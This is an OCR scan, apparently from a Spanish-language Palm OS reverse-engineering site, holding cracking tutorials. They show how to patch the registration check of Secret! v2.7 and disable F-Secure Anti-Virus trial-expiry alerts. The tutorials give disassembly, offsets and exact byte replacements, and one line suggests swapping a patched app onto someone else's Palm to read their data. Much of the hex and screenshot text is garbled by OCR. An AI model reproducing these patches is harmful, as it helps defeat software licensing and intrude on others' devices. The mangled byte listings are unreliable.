Cargando este PRC con PRCexplorer buscamos el formulario donde se nos muestra un botón que dice como registrarnos veamos que está en 
la dirección: tFRM y sub ramal 


1005 (0x03ed) <--- Dirección del formulario , en está se nos muestra un botón SelectorTrigger con dirección: 


SelectorTrigger (9000): 
Offset: Ox01c8 <--- Si estamos registrados podría ser que este botón desaparezca , intentemos por aquí, buscando en el código muerto, al 
presionar este botón nos envia a un formulario de registro en la dirección: 


9999 (0x270f) <---- Muestra el formulario de registro 

Acontinuación 

Mirando en el mismo arbol de formularios que nos muestra el PRCExplorer encontramos en el formulario about con dirección 8900 (0x22c4) 
clickamos dentro del formulario en la etiqueta que dice sinregistrar y observamos que esta Label (Que nos muestra la frase "Not 


registered!" ), se encuentra en la dirección : 


Label (9061): 
Offset: 0x00de 


Paso 3 .- Ahora procedemos 


00004EF4 42 40 CLR.W DO <--- Cambiar a MoveQ +1,D0 (7001 Hexa) 


En está parte de código cambiaremos el '4240" por ''7001", usando nuestro editor hexadecimal faborito en nuestro caso el "UltraEdit32 
v10.00c Spanish", veremos el archivo Trial y el parchado en la figura de abajo, solo basta con buscar la cadena CTRL+F y tecleamos la 
cadena hexadecimal ''67 0C2f044e4fa0124240" 


C” UltraE dit-32 - C:1My DownloadsiSecret! v2.7 - Encripta texto a 128 Bits - Trial. pre 


| Archivo Editar Buscar Proyecto Wer Formato Columma Macro Avanzado Wentana ¿Ayuda 
UN Secret! v2.7 - Encripta texto a 128 Bits - cracked.pre  Secretl v2.7 - Encripta texto a 128 Bits - Trial. pro | l 


24 C:AMy DownloadsiSecretl v2.7 - Encripta texto a 128 Bits - cracked.pre 


0000%eb0h: 60 DO 00 50 2F 06 2F 04 4E 4F AD C5 ZF 07 
D0000%ecO0h: 4E 4F AD Có 2F 05 2F 04 4E 4F AD CÉó 2F 04 


00004ed0h: 

00004ee0h: 

0000%ef0h: 

00004f00h: 70 01 4C EE 00 FS FF EC 4E SE 4E 75 4E 56 

00004f10h: 24 2E 00 08 22 02 E7 89 292 82 20 01 El 88 

00004f20h: ES 88 DO 82 2F 3C€ D0 03 F4 80 06 80 00 00 

[A aa DA 94 80 

EA 

| Buscar 8Fr 24 00 
80 2F 3C 


l 
Las cadenas Hex deberían tener dos caracteres por 
“byte y cada byte puede estar separado de otro con un 


E espacio: 
Ejemplo: FF FE FD o FFFEFD 
| T Buscar ASCII 
1 Mayúsculas y minúsculas 


Cancelar ple 
Dirección 07 4E 4F 
, , 240 52 43 
C Ariba (* Ab 
=l dd | Ayuda 10 66 06 


1 7 Expresiones regulares [solamente ASCII] 


UDUUDOS e Ú H 3 y Sau = Ú 


0000%edO0h: 01 38 2F 04 61 00 
0000%ee0h: ZE DD 61 0D 
00004ef0h: 
00004 f00h: 
00004f10h: 
00004f£20h: 
00004f30h: 


¡ERE AR A MR Ss 


Si necesita ayuda, pulse Fl 


Guardamos el PRC File modificado con el nombre que quieramos y lo ejecutamos 


w Default 


Este programa sirwe para encriptar 
notas con encriptación de 128 bit 

Al cargar la aplicacion nos pide un 
password 


Vease como si no estamos registrados nos aparecía una etiqueta de "Please registered" 


..P/./.NOÓH/./. 
NOiá3/./.NOá3/.a. 


.8/.a..$£.0...d 


Ho 


DD .../.NOá. 
p.L . 
." peré .bé£ú 


o 


% 


o: , 
. EPA; AO 


YN NUNV.. 


d83é/<..1G.G..18 
/.a.GÍyPA$.péoq”. 
beñmédeÉq/<..9q.ú 
..19/.a.GtPAS.pé 
bq".bemédeEq/<.. 


YN *NUNV.. 


5...".peré .béÉú 
d8sé/<..1...18 
/.a.GyPA$.péoq". 


y Portapapeles 24 de 24 


[Pos: 4eecH, 20204, CO DOS [Mod.: 13/12/01 06:34:14p.m. [Bytes : Elemento recopilado, 


desde el emulador intentamos registrarnos con "124567980" y esto es lo que vemos nos muestra una ventana que dice 


E 


Registration 11] 


Secretlis shareware and must 
be registered for US$ 19 at 


Thank you 


Thank you for 


registering Secret! 
Your registration 
number will be valid for 
all future upgrades of 
Secret 


Despues de registrarnos y adelantar el reloj 5 años desaparece la etiqueta "Please registered" 


[Secret!| w Default 


Este programma sirve para encriptar 
notas con encriptación de 128 bit 

Al cargar la aplicacion nos pide un 
password 


AATATATA 


Ademas en el Menu About vemos que pudimos hacer que aparescamos registrados. 


Strong 1283 bit Strong 1283 bit 
encryption encryption 


Not registered! e Registered for 


Sin parchar File Comportamiento del File Parchado 


Paso 4 .- Concluciones 


Este programa no es nada seguro ya que podemos accesar a la información de un usuario que tenga instalado este programa ,solo basta con 
cambiar un archivo parchado con el archivo parchado que hicimos solo basta con borrar el archivo del palm enemigo e instalar el nuevo PRC 
(Sobreeescribir), 


Algo me dice que las aplicaciones que crean los tipos de www. linkesoft.com siempre se les ocurre usar esta misma rutina de comprobación 
para todas sus aplicaciones, al menos siempre tendremos que encontrar un par de instrucciones que siempre van de la mano y que son (Al 
menos LClock v1.0 usa esa misma rutina): Ya es cuestión de ustedes si entran a husmear otras aplicaciones en esa web, No sabemos cuando 
cambiarán su esquema de protección. 


Participen con sus tutoriales. 


¡¡¡ Ninguna ley en ningún país debe de prohibir la libre expresión y no debe de pagar nada a sus respectivos autores , Que es lo que aplica 


Constitución política de mi país (Al menos aquí es legal y nos ampara nuestra constitución politica) 


Palm Spanish Tutor: Página dedicada a la divulgación de información en Castellano, sobre Ingeniería 


Inversa y Programación en Palm. E-mail "Colabora con tus Proyectos" 


Palm Spanish Tutor 


()Serial (X)HotSync/Code ()Trial ()Multiprotección ()Encriptado (X)Otro 


Palm CRACKER: SkyNet | FECHA: V/06/Enero/2006 


INTRODUCCION 


AL ATAQUE 
1.- Analizando 


Desensamblando y rastreando con el debugger nos encontramos con el siguiente 
fragmento de código les pongo un fragmento del código muerto. 


loc_C21D: 

0000C21D 4E 4F Al 73 SysTrap FrmGetActiveForm 
0000C221 26 48 MOVE.L AO, A3 

0000C223 2F 0B MOVE.L A3, -(A7) 

0000C225 4E 4F Al “71 SysTrap FrmDrawForm 
0000C229 2F OB MOVE.L A3, -(A7) 

0000C22B 4E BA FO 42 JSR.L LOC_B26F 
0000C22F 78 01 MOVE.L +$$1, D4 

0000C231 50 4F ADD.W $$8, A7 

0000C233 60 00 02 24 BRA LOC_C459 
loc_C237: 

0000C237 20 6F 00 2C MOVE.L $2C(A7), AO 
0000C23B 30 28 00 08 MOVE.W $8(A0), DO 
0000C23F 04 40 04 33 SUB.W +$0433, DO 
0000C243 67 OA BEQ.S LOC_C24F 


0000C245 
0000C247 
0000C24B 


loc_C24F: 


0000C24F 
0000C253 
0000C255 
0000C259 
0000C25D 
0000C263 
0000C265 
0000C269 
0000C26B 
0000C26D 
o000c271 
0000C277 
0000C279 
0000C27D 
0000C27F 
0000C283 
0000C285 
0000C289 
0000C28B 
0000C28rF 
0000C293 
0000C295 
0000C299 


loc_C29D: 


0000C29D 
o000c2A1 
0000C2A3 
0000C2A7 
0000C2A9 
0000C2AB 
0000C2AD 
0000Cc2B1 
0000C2B3 
0000C2B5 
0000C2B9 
0000C2BB 
0000C2BF 
o000c2c1 
0000C2C3 


loc_C2C7: 


0000C2C7 
0000C2C9 
0000C2CD 
o000c2D1 
0000C2D5 
0000C2D9 
0000C2DB 
0000C2DD 
0000C2E1 
0000C2E3 
0000C2E7 


40 
00 
00 


4F 
48 
2D 
00 
6D 
38 
4F 
80 
17 
AD 
80 
24 
FA 
30 
FA 
50 
FA 
50 
3C 
4F 
01 
EF 
00 


3C 
OB 
4F 
4F 
00 
OB 
4F 
08 
07 
4F 
08 
EF 
06 
01 
00 


06 
6D 
4F 
78 
4F 
48 
OE 
4F 
48 
78 
78 


SUB.W +$1, DO 
01 F8 BEQ LOC_C441 
02 0C BRA LOC_C459 


Al 73 SysTrap FrmGetActiveForm 


MOVE.L AO, A3 

C8 3C TST.B VAR_37C4 

01 C8 BNE LOC_C423 

00 03 C8.. CMP.W +$0003, VAR_37C2 
BLT.S LOC_C29D 

AO F5 SysTrap TimGetSeconds 
MOVE.L DO, (A7) 

MOVE.L (A7), DO 

Cc8 40 SUB.L VAR_37C0, DO 

00 00 02.. CMP.L +$00000258, DO 
BCC.S LOC_C29D 

01 E8 LEA.L $1E8(PC), AO 

PEA.L (A0) 

01 E4 LEA.L $1E4(PC), AO 

PEA.L (A0) 

01 E0 LEA.L S1EO(PC), AO 

PEA.L (A0) 

03 E9 MOVE.W $+$03E9, -(A7) 

Al 94 SysTrap FrmCustomAlert 
MOVE.L +$1, D4 


00 OE LEA.L SE(A7), A7 


01 BE BRA LOC_C459 


04 32 MOVE.W +4$0432, 
MOVE.L A3, -(A7) 

Al 80 SysTrap FrmGetObjectIndex 
ADD.W $$6, A7 

MOVE .W DO, -(A7) 

MOVE.L A3, -(A7) 

Al 83 SysTrap FrmGetObjectPtr 
MOVE.L AO, D7 

MOVE .L D7, -(A7) 

Al 39 SysTrap FldGetTextPtr 
MOVE.L AO, D6 

00 0A LEA.L $A(A7), 
BNE.S LOC_C2C7 
MOVE.L +$$1, D4 

01 94 BRA LOC_C459 


(Ad) 


A7 


MOVE.L D6, -(A7) 

C8 32 PEA.L VAR_37CE 

AO C5 SysTrap StrCopy 

00 29 PEA.L $29 

AO 1E SysTrap MemHandleNew 
MOVE.L AO, A6 

MOVE.L A6, -(A7) 

AO 21 SysTrap MemHandleLock 
MOVE.L AO, AZ 

00 00 PEA.L $0 

00 00 PEA.L $0 


0000C2EB 
0000C2ED 
0000c2rF1 
0000C2F5 
0000C2F9 
0000C2FD 
0000C2FF 
0000C303 
0000C307 
0000C30D 
0000C30F 
o000c311 
0000c313 
0000Cc317 
0000Cc319 


loc_C31B: 


0000C31B 
0000C31D 
o000c321 
0000C323 
0000C327 
0000C32B 
0000C32F 
0000c331 
0000C333 
0000C337 
0000C339 
0000C33B 
0000c341 
0000C345 
0000C349 
0000C34F 
o000c351 
0000C353 
0000C357 
0000C359 
0000C35B 
0000C35F 
0000c361 
0000C365 


loc_C367: 


0000C367 
0000C369 
0000C36D 
o000c371 
0000C375 


0000€C377 


0000C379 
0000C37B 


loc_C37D: 


0000C37D 
0000c381l 


2F 
48 
48 
48 
4E 
2F 
48 
48 
06 
4É 
2A 
4A 
4F 
66 
7A 


2F 
4É 
2F 
4E 
48 
4E 
24 
20 
4F 
67 
20 
22 
48 
48 
06 
4E 
2F 
41 
48 
2F 
4É 
76 
4F 
60 


70 
10 
41 
12 
48 


B2 


66 
52 


el 
6D 


oc 
78 
78 
78 
4F 
oc 
7A 
7A 
97 
75 
00 
14 
EF 
02 
01 


OE 
4F 
OE 
4F 
78 
4F 
48 
OA 
EF 
SE 
05 
Eje 
7A 
7A 
97 
75 
00 
FA 
50 
OA 
4F 
00 
EF 
16 


00 
32 
ED 
30 
81 


40 


08 
43 


43 
E4 


MOVE.L AZ, -(A7) 

00 00 PEA.L $0 

00 00 PEA.L $0 

00 00 PEA.L $0 

A2 A9 SysTrap Dl1kGetSyncInfo 
MOVE.L AZ, -(A7) 

00 OE PEA.L SE(PC) 

00 04 PEA.L $4 (PC) 

00 00 11.. ADD.L *F$000011D8, (A7) 
RTS 

MOVE.L DO, D5 

TST.B (AZ) 

00 2C LEA.L $2C(A7), A7 
BNE.S LOC_C31B 

MOVE.L +$1, D5 


MOVE.L A6, -(A7) 

AO 22 SysTrap MemHandleUnlock 
MOVE.L A6, -(A7) 

AO 2B SysTrap MemHandleF ree 
00 09 PEA.L $9 

AO 13 SysTrap MemPtrNew 
MOVE.L AO, A2 

MOVE.L A2, DO 

00 0C LEA.L $C(A7), A7 

BEQ.S LOC_C397 

MOVE.L D5, DO 

00 01 00.. MOVE.L *+$00010000, D1 
00 OE PEA.L $E(PC) 

00 04 PEA.L $4 (PC) 

FF FF A4.. ADD.L *+-$00005B98, (A7) 
RTS 

MOVE.L DO, -(A7) 

01 2E LEA.L $12E(PC), AO 
PEA.L (A0) 

MOVE.L A2, -(A7) 

A2 DE SysTrap StrPrintF 
MOVE.L +$0, D3 

00 0C LEA.L $C(A7), A7 

BRA.S LOC_C37D 


MOVE .L +50, DO 

30 00 MOVE.B $0(A2, D3.W), DO 
C8 OE LEA.L VAR_37F2, AO 

30 24 MOVE.B $24(A0, D3.W), D1 


CMP.W DO, D1 <--- Aquí se comprueba si estamos o no estamos 


registrados cambiemos está instrucción por una 
por (cambiar el B240 por B140) 
Parchar está instrucción. 

BNE.S LOC_C383 

ADD.W +$1, D3 


00 05 CMP.W +$0005, D3 
BLT.S LOC_C367 


loc_C383: 


0000C383 
0000C387 
0000C389 
0000C38D 


loc_C38F: 


0000C38rF 
o000c391 
0000C395 


loc_C397: 


0000C397 
0000C39B 
0000C39D 
0000Cc3A1 
0000C3A3 
0000C3A7 
0000C3A9 
0000C3AD 
0000C3AF 
0000C3B3 
0000C3B7 
0000C3BB 
0000C3BF 
0000C3C3 
0000C3C5 
0000C3C7 
0000C3CB 
0000C3CF 
0000C3D3 
0000C3D5 
0000C3D9 


loc_C3DD: 


el 
66 
1B 
c8 


2F 
4É 
58 


4A 
67 
41 
48 
41 
48 
41 
48 
3F 
4E 
3F 
3F 
4É 
54 
2F 
4É 
4A 
4F 
66 
42 
4É 


43 
06 
7C 
3C 


OA 
4F 
4F 


2D 
4E 
FA 
50 
FA 
50 
FA 
50 
3C 
4F 
3C 
36 
4F 
4F 
08 
4F 
2D 
EF 
08 
2D 
BA 


00 05 CMP.W F*$0005, D3 
BNE.S LOC_C38F 

00 01 MOVE.B +$7C, $1(A5) 
AND.B +$3C, D4 


MOVE.L A2, -(A7) 
AO 12 SysTrap MemChunkFree 
ADD.W +$4, A7 


C8 3C TST.B VAR_37C4 
BEQ.S LOC_C3EB 

00 EA LEA.L SEA(PC), AO 
PEA.L (A0) 

00 E6 LEA.L S$E6(PC), AO 
PEA.L (A0) 

00 E2 LEA.L $E2(PC), AO 
PEA.L (A0) 

03 EA MOVE.W +$S03EA, -(A7) 
Al 94 SysTrap FrmCustomAlert 
03 F7 MOVE.W +$03F7, -(A7) 
03 EC MOVE.W +$03EC, -(A7) 
Al 7E SysTrap FrmGetFormPtr 
ADD.W +$2, A7 

MOVE.L AO, -(A7) 

A2 FO SysTrap FrmSetMenu 
C7 FC TST.B VAR_3804 

00 14 LEA.L $14(A7), A7 
BNE.S LOC_C3DD 

C8 03 CLR.B VAR_37FD 

BC A8 JSR.L LOC_8083 


2.- SOLUCION 


0000C377 B2 40 CMP.W DO, D1 <-—-- Aquí se comprueba si estamos o no estamos 
registrados cambiemos esta instrucción por una 


por HO DO, DO 


Parchar esta instrucción. 
Buscar con ultraedit32 v10 la siguiente cadena: 


(cambiar el B240 por B140) 


0000c370h: OE 12 30 30 24 48 81 B2 40 66 08 52 43 0C 43 00 ; ..00$H+?2Qf.RC.C. 
Reemplazamos por la siguiente Cadena: 
0000c370h: OE 12 30 30 24 48 81 B1 40 66 08 52 43 0C 43 00 ; ..O00SH++Qf.RC.C. 


Hasta aquí con este tutorial. 
Participen con sus tutoriales. 


Palm Spanish Tutor: 


Inversa y Programación en Palm. E-mail 


Página dedicada a la divulgación de información en Castellano, 
"Colabora con tus Proyectos” 


sobre Ingeniería 


Palm Spanish Tutor 


Protección: |()Serial ()HotSync/Code ()Trial ()Multiprotección ()Encriptado (X)Otro 


)Avanzado ( )Master ( )Gúru 


Palm CRACKER: post nubila(Wyahoo.com.br | FECHA : V/06/Enero/2006 


INTRODUCCION 


Programa: 
F-Secure Anti-virus Versáo 2.0 
F-Secure Anti-Virus 


(1) You are running F- 

3. Secure Anti-Virus 2.0 
evaluation version 
which will run until 
Oct 13, 2005. 

After evaluation period 
you must purchase full 
version. 


| Close ] 


Fig. 1 


Mensaje que aparece al cargar el programa nos dice que estamos en un periodo 
de prueba y que que expirará en 30 días después de la fecha de instalación. 


Após instalado, expira dentro de alguns dias. 
Despues de instalarlo expirara en algunos dias 


F-Secure 


“Fsecure Anti ins 
for Palm Os 


[Scan now] [About ] 


Al Ataque 


Patch: 


Localizamos com o PRCExplorer as Talts conforme FIG. 3 e FIG. 4. 
Localizamos con el PRCExplorer las TALTS mostradas en la Fig.3 y Fig.4 


Palm Application Explorer - fsavw 


File Edit View Help 
¡SABE |S|24|J[L 
E- fear pro = a o . 
> Talt (8) Resource size: 174 bytes Fl 
1000 [0,0328] 
! e gui F-Secure Anti-Virus 
1200 (00460 
A (0051 8 (1) You are running 
a Etc 5% F-Secure Anti-Virus 2.0 
1400 (00578) evaluation version 
1500 (Ox05dc: which will run until 
SU0 UR oac] aL 
1600 (0x0640] After evaluation period 
1700 (Ox0634] you must purchase full 
a version. 
> Tbmp (3) a 
1234 [0x0402 clase | 
EIA 0 A A 


Fig. 3 Se muestra la Talt 1400 (0x578) Periodo de evaluacion comprar versión completa ...... 


Palm Application Explorer - fsavw 


File Edit View Help 


EAJESCICIRA IE 
E fsav.pre - 

E Talt (8) Resource size 
1000 (0x03e8] 


153 bytes 


F-Secure Anti-Virus 


1X] Your evaluation version 
of F-Secure Anti-Virus 
2.0 has expired. Please 
purchase full version 
frorm 
WWwWWw.f-secure.coméwir 
eless 


Close | 


No PRCEdit localizamos as referéncias ás Talts 1400 (0x0578) e 1500 (0x05dc) conforme FIG. 5. 


Cargamos la aplicación con PRCEdit las TALT 1400(0x578) y la 1500(0x05dc) con forme a la figura 5 


Prcedit - [code0001.s] Oe) 
[=] 


M rie Edt view Tools Window Help dE 
isav patched.pre | RCP code0001.s ] Ps Ade 


9 000 
ooo 
7 ooo 
1000 Error ! 2 000 
1100 Untitled 2463 000 
1200 Application infected | || 2464 DODOZ 26116) 
1300 Vis fun! 00002144 3L3DSTE. MOVE. ALADO IGS78,— (AT) 7 F-Secure Anti-V 
1400 F-Secure ántiinus ¿ 000021: al9 dl H $1194 = sysTrapFrreCustomilert 
OY References 467 000 LEA 30(47),A7 
4 00002144] 000 CLR.B— -1(247) 
$ 00002003 000 0008 PEA $0008.W 
1500 F-Secure Antros 000 óde9985 PEA -5736/(15) 
+ 1600 F-Secure 4nti4éinas Pf 1 000 q4e4fabz”7 TRAP H15,$14027 = sysTrapMemiset 
2000 MOVEO 20,DO 
efDODs LEA 10(27),27 
261£ L283 MOVE.L  (27)+,D3 
Se UNLK 16 
75 RTS 


q4ebad67s J3R 
491fa0034 LEA 
4350 PEA 
91fa0030 LEA 
45350 PEA 


= O pro 
le DJ te by 0) 
O 0004 
a o | 
» 
le 
o 
2 


í 


AS 
10] 
las 
10 
H 
H 
110 
m 
mn 
[5] 
to 
I 
158) 
Tm 
g 


Hu 
3 


00 ta 
RN -J] 63m 
0 -J]H 
E 
15) 
o 
[53 


co 


+ 1700'%'arming - 000 
23 Strinas 000 
Sa Datal 23974 000 


dc.b y o Doo 
Keywords 246 000 


Changes ooo pood DC. W ÑO 
Search Results ; : DDD dono DC. W ÑO 


¿le 4e560000 LINE 16, 
2172 4e4falal TRAP $15,$11141 = sysTrapFrraClosedllForra 
ese UNLE 16 

[ 


000 
000 
ooo 


00002175 ers RTS 
000021 7a 4e560000 L257 LIME 46,20 3 


ODO 
5 5000 
5 000 
oDo 
o0o 
ooo 
ODO 
ODO 
ooo 


40e71c35 MOVEM.L D3-D5/A2-44,-(47) 
ebo0e MOVE.W  141[(246),- (147) 
? 


3co2003000 MOVE.L  F33566720'$2003000,-(47) 
haebíla JSR L69 

3600 MOVE.W  DO,D3 

Sc4f ADDO.W 6,47 

6706 BEQ L255 

3003 MOVE.W  D3,DO 

60000163 ERA L302 


1 O mn DNS co E e DO a O] ee [Y] e JA] cs DN e A cs O e O e A e | 


00002190 302e0008 MOVE. 5/2461,DO dl 
2 
ai TETToTO: Y Aaa SA 


¿2 Iniciar As E:jArquiv... Palm OS... Fsav - Pal... (5) Document... Preedit 


FIG. 5 


Na FIG. 6 localizamos a Talt 1400 e editamos o código substituindo sua chamada por 4 NOPs, assim: 


/ FR Resources x2140: 6065 6420 2100 4E56 0000 2F0A 2 ad /./.2n 
9 Forms loz2150: 0008 0052 0017 6668 362A 0008 3FD3 4E4F ...R..fh6x*..? me 
| E9 Alerts 0x2160: A16F 2448 2FOA 4E4F A174 5C4F 0043 OSDC  ¡oSH-.NOItw0.C.l 

ES + 1000 Error! 0x2170: 673E 0043 0578 6724 0043 0440 6716 0043 ol 
SS DA melcatoniniented! [[052180: D3E8 6702 6036 487A FC20 2FOA 4E4F A19F .ég.'6Hzú /.NOII 
ao a (0x2190: 504F 6028 4874 FEEO 2F0A 4E4F A19F 504F PO' (Hzpá/.NO¡IPO 
5. + 1400 F-Secure ArtiVius [[OZ21A0: 6014 487A F8BA 2F0A 4E4F A19F 504F 6000 '.Hza2/.NO¡IPO' 
Él References 0x21B0: 4874 FSBC 2FOA 4E4F A19F 504F 7001 6002 la NO ¡1POp. 
00002144 0x2100: 7000 261F 245F 4ESE 4E75 4ES6 FFE6G 4878 p.£.5 N "NuNViyeHz 
e) 00002003 0x21D0: FFFF 486E FFES 4E4F A11D 486E FFES 4E4F sA/HnyeNo¡ .Hnexo 
1500 F-Secure Antivirus: HO 21E0: ADA9 4A00 4FEF 000€ 6630 486E FFE6 486E  0J.0i..f0HnieHn 
YY References 0x21F0: FFES 4878 0000 4E4F A1BF 4400 4FEF 000€ yeHx..NOi¿J.0i.. 
ne 0x2200: 6618 486E FFES 4EBA FF3E 4400 584F 6604 f.HnveNos>J.XOf. 
+ 00002004 0x2210: 486E FFES 4E4F A1AO 584F 0C6E 0016 FFES HnyéN0i XO.n..ye 
1600 F-Secure AntiVins ([0Z2220: 66AC 4ESE 4E75 4ES6 FF88 2F03 4EBA E28C  £N"NuNYyI/.N2ál 
+ 1700 Warming 0x2230: 1600 6706 7000 6000 0094 4EBA OSFC 3600  ..g.p. ..IN2. 46. 
29 Strings 0x2240: 3003 6730 5340 6704 5340 6760 5340 6712 0.9<50y.S09130g. 
1 E DataD 0x2250: 6066 3F3C O5DC 4E4F A192 3030 3039 544F '£?<.UNO¡“O<09TO 
19 deb 0x2260: 6064 3F3C DODE 4EBA 0286 3600 544F 6710 “3j?<..N2.16.TOg. 


.- dt 0x2270: 3F3C 05DC 4E4F A192 3030 1538 544F 6040  ?<.UNOi¡i”*0<.8TO'L 
Changes 
SY Search Results 


0x2280: 486E FF88 4EBA 0392 1F30 0007 2F2E FFE8C HnyIN2.*.<../.yl 
lox2290: 1F30 0019 486E FFE6 4EBA 0678 41FA 0034 .<..Hnfell0.xAú.4 
J0x22A0: 4850 41FA 0030 4850 486EÉ FFE6 4E71 4E71 HPAú.OHPHnyeNqNg 
|0x22B0: 4E71 4E71 4FEF 001E 4227 4878 0008 486D NqNg0i..B'Hx..Hm 
10x2200: E998 4E4F A027 7000 4FEF 000A 261F 4E5E élNO 'p.01..£.N* 
10x22D0: 4E75 0000 0000 4E56 0000 4E4F A1A1 4ESE Nu....NV..NO¡¡N” 
J0x22E0: 4E75 4E56 0000 48E7 1038 3F2E 000E 2F3C NuNV..Hq.8?...7< 
J0x22F0: 0200 30 4EBA E6FA 3600 5C4F 6706 3003  ..0.N%e46.50g.D. 
(0x2300: 6000 0164 302E 0008 6764 5740 6700 0084 “..j0...gjWeg..l 


La 


lr 
A 


l0x2310: 5740 6700 0156 5340 6700 0130 0440 7FF9 Wag..VS0g..0.0lk 
0x2320: 6752 5340 6720 5340 6704 6000 013E 4EBA gyRS0g,S0g.'..>N2 
102330: FEF6 3600 6706 3003 6000 0132 3F3C 0440 pó6.9.0. ..22<.L E o 


oo 


O 


Iniciar (E A E:Arquiv... Palm OS... fsav - Pal... [mw Document... Preedit 


FIG. 6 


Voltamos ao código pressionando F9 e procuramos a outra Talt (1500). Encontramos as referéncias 000020ea e 00002108. Vamos primeiro ver a 0OOO020ea. 


Prcedit - [code0001.s] Ea) 


MD rie cdt view Tools Window Help 3 
A tsav,patched.pre ] REP codeb0D1.: | : 


MOVE. DO,D3 A 


Dooo20dé 3600 
DODO: 3003 MOVE.W  D3,DO o 
ooo 673c EEO L2s1 
1000 Error ! 2931 000 5340 SUBQ.W  H1,DO 
1100 Untitled : 000 670a BEO L279 
1200 Application infected | : 000 5340 SUEBQ.W  $1,DO 
1300 Virus found | 2434 000 6760 BEO L282 
1400 F-Secure ántiirus 2435 000 5340 SUBO.W  f$1,DO 
5 DOD 6712 BEQ L250 
oooO: 56066 ERA L252 
asin DODOZ0sa  AfIG0Sde 2 7S MOVE. A1SOO!$SdC,= (40) 5 F-Secure Anti-V 
DOODz 4e4faloz TRAP $H15,$1192 


MOVE. V 
ADDO.W  H2,47 


000 
000 


000 ERA L253 
ooo L2¿50 MOVE.W  H14!$e,-(247) 
+ 1600 F-Secure Antlnas : 000 J3R L310 
+ 1700'Waming 5 000 MOVE. DO,D3 
+29 Stinas 000 ADDO.W $2,A7 
E 23 DataD 2 000 BEO 
1-88 deb 000 Lo MOVE. $1500!'$5dc,- (47) ; F-Secure Anti-V 
Ey Keywords 249S ooo 4e4fal92 TRAP sysTrapFrrdlert 
3 É2)/000 303c1535 MOVE . DO 
o00 544f ADDO.W 2,147 
00 6040 ERA L253 == 
2 000 q4o6effos L251 PEA -120/(26) 
000 q4ebaDd392 JS3R L315 
Doo 1£3c0007 MOVE.B H7,-1(47) 
000 ¿feieffoc MOVE.L  -116/246)1,- (27) 
000 113c0019 MOVE.B  H25!$19,-(247) 
000 q4obeffeb PEA 26/16) 
ooo qgebabdó675o JSR L347 
00 41fa0034 LEA L254,240 
ono 4550 PEA 
0000 31fa0030 LEA 10 del 


[e 


Ln 2438, Col 1 


A E:Arquiv... Palm OS... fsav - Pal... [mv Document... Prcedit 


¿¿ Iniciar M5 E:|Arquiv... Palm OS... Fsav - Pal... (5) Document... Preedit 


FIG. 7 


Procuramos onde a rotina L279 é chamada e encontramos a linha 000020de (a sexta linha acima da referéncia encontrada). Pressionamos F9 e substituímos por 
NOP, assim: 


Prcedit - [EMlArquivos de Programasi5StanleyWPalmiCrackWPRCsifsav. patched.prc] 


patched pro | RCP | code0001.s | 


50: 0008 0C52 0017 6668 362A 0008 3F03 4E4F ...R..fh6*..?.NO 
60: A16F 2448 2F0A 4E4F A174 SC4F 0C43 0OSDC loSH-.NOItx0.C.U 
70: 673E 0C43 0578 672A 0C43 044C 6716 0C43 g>.C.xg*.C.Lg..C 
80: 03E8 6702 6036 487A FC20 2F0A 4E4F A19F .éeg.'6Hzú /.NO|1 
90: S04F 6028 487A FEEO 2F0A 4E4F A19F S504F PO' (Hzpba/.NOiIPO 
AO: 6014 487A F8BA 2F0A 4E4F A19F S504F 600€ .Hzw2/,NO| 1PO 
BO: 487A FS5BC 2F0A 4E4F A19F 504F 7001 6002 Hz5M“.NO¡IPOp."'. 
CO: 7000 261F 245F 4ESE 4E75 4ES6 FFE6 4878 p.S.5_N"NuNVyeHx 
OD: FFFF 406 FFES 4E4F A11D 486EÉ FFEB 4E4F yYHnyeN0i¡ .HnyeNo 
EULMADAS 4400 4FEF 000€ 6630 486E FFE6 486É 6J.01..f0HnyeHn 
Ox21F0: 8 4878 0000 4E4F A1BF 4A00 4FEF 000€ yeHx..NOi¿J.O01.. 
0x2200: 6610486EÉ FFES 4EBA FF3E 4A00 584F 6604 f£.HnyéeN2y>J.XOf. 
URSZ10: 486E FPEO 4E4F A1A0 584F OC6E 0016 FFES HnyéeNOi XO.n..yé 
0x22209_66AC 4ESEME7S5 4E56 FF88 2F03 4EBA E28C f£-N"NuNVy1/.N2ál 
0x2230: 1880 6706 7U89 6000 0094 4EBA OSFC 3600 ..g.p.' ..1N2.u6. 


=b 0000208a 
=> 00002108 
«> 00002004 
+ 1600 F-Secure AntiVrus 


+ 1700 Wening 0x2240: 3003 NGC 5340 PE71 5340 676C 5340 6712 0.y<SeÑlgseg1seg. 

+ Y Stmgs 0x2250: 6066 3F3U WDC 4E4F A192 3030 3039 S44F '£?<.UNOI “O<D9TO 

+ Qy Data 0 0x2260: 606A 3F3C DOOP4EBA 0286 3600 544F 6710 'j?<..N2.16.TOg. 

+ q deb 0x2270: 3F3C OSDC 4E4F AÍÑ92_3030 1538 544F 6040  ?<.UNOi”0<.8TO'L 

+ Y Keywords 0x2280: 486E FF88 4EBA 0392 TPC 0007 2F2E FF8C HnyIN2.”.<../.yl 
UY Changes 


0x2290: 1F3C0 0019 486E FFE6 4EBA DSZA 41FA 0034  .<..HnyeN?2.xAú. 4 
0x22A0: 4850 41FA 0030 4850 486É FFEb 4E71 4E71 HPAú. O0HPHnyeNgNg 
0x22B0: 4E71 4E71 4FEF 001E 4227 4078-0008-486D NqNg01..B'Hx..Hm 
0x22C0: E998 4E4E-A027 7000 4FEF 000A 261F 4ESE élNO 'p.01..£.N” 
0x22D0: 4E75 0000 0000 4E56 0000 4E4F A1A1 4E5É Nu....NV..NO¡¡N” 
0x22E0: 4E75 4E56 0000 48E7 1038 3F2E 000 2F3C NuNV..Hq.87?...< 
0x22F0: 0200 3000 4EBA E6FA 3600 5C4F 6706 3003 ..0.N%eú6.M0g.0D. 


4 Search Results 


0x2300: 6000 0164 302E 0008 6764 5740 6700 0084 "..j0...gjwWgy..! 
0x2310: 5740 6700 0156 5340 6700 0130 0440 7FF9 wWeg..VS68g..0.6lú 
0x2320: 6752 5340 672€ 5340 6704 6000 013E 4EBA yRSGg,SBg,' ..>N2 


0x2330: FEF6 3600 6706 3003 6000 0132 3F3C 044C  pbo6.g.0.*..27?<.L 
0x2340: 4E4F Al19B 4EBA FEB4 4EBA FFEC 544F 6000 NO! IN*p1N2y14TO 


FIG. 10 


Procuramos agora a outra referéncia e encontramos: 


Prcedit - [code0001.s] EEx] 


M Fie Edit view Tools Window Help a - => 
: OA temiendo] aer anna] A A 


6066 BRA E 


, 2582 AN 
E (a | Forms ooDoo0z20e: 3f3cOS5dc L279 MOVE.W  $1500!$S5dc,-(147) ; F-Secure Ainti-W y 
